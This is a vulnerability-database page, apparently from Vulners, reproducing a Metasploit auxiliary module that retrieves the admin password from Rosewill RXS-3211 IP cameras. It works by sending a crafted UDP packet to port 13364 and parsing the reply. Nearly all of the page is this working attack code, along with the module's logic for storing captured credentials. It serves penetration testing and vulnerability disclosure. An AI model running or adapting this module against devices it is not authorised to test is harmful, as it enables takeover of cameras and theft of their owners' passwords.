Lucene search
K

Rosewill RXS-3211 IP Camera Password Retriever

🗓️ 25 May 2011 22:06:51Reported by Ben SchmidtType 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

Rosewill RXS-3211 IP Camera Password Retriever module takes advantage of a protocol design issue to retrieve and reset password

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Rosewill RXS-3211 IP Camera Password Retriever',
      'Description' => %q{
          This module takes advantage of a protocol design issue with the Rosewill admin
        executable in order to retrieve passwords, allowing remote attackers to take
        administrative control over the device.  Other similar IP Cameras such as Edimax,
        Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.
        The protocol design issue also allows attackers to reset passwords on the device.
      },
      'Author'      => 'Ben Schmidt',
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        Opt::CHOST,
        Opt::RPORT(13364),
      ])
  end

  def run_host(ip)
    #Protocol
    target_mac = "\xff\xff\xff\xff\xff\xff"
    cmd  = "\x00"          #Request
    cmd << "\x06\xff\xf9"  #Type

    password = nil

    begin
      udp_sock = Rex::Socket::Udp.create( {
        'LocalHost' => datastore['CHOST'] || nil,
        'PeerHost'  => ip,
        'PeerPort'  => datastore['RPORT'],
        'Context'   =>
        {
          'Msf' => framework,
          'MsfExploit' => self
        }
      })

      udp_sock.put(target_mac+cmd)

      res = udp_sock.recvfrom(65535, 0.5) and res[1]

      #Parse the reply if we get a response
      if res
        password = parse_reply(res)
      end
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
      print_error("Connection error")
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      udp_sock.close if udp_sock
    end

    #Store the password if the parser returns something
    if password
      print_good("Password retrieved: #{password.to_s}")
      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'ipcam',
        user: '',
        password: password,
        proof: password
      )
    end
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def parse_reply(pkt)
    @results ||= {}

    # Ignore "empty" packets
    return nil if not pkt[1]

    if(pkt[1] =~ /^::ffff:/)
      pkt[1] = pkt[1].sub(/^::ffff:/, '')
    end

    return pkt[0][333,12] if pkt[0][6,4] == "\x01\x06\xff\xf9"
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Aug 2017 01:01Current
0.9Low risk
Vulners AI Score0.9
21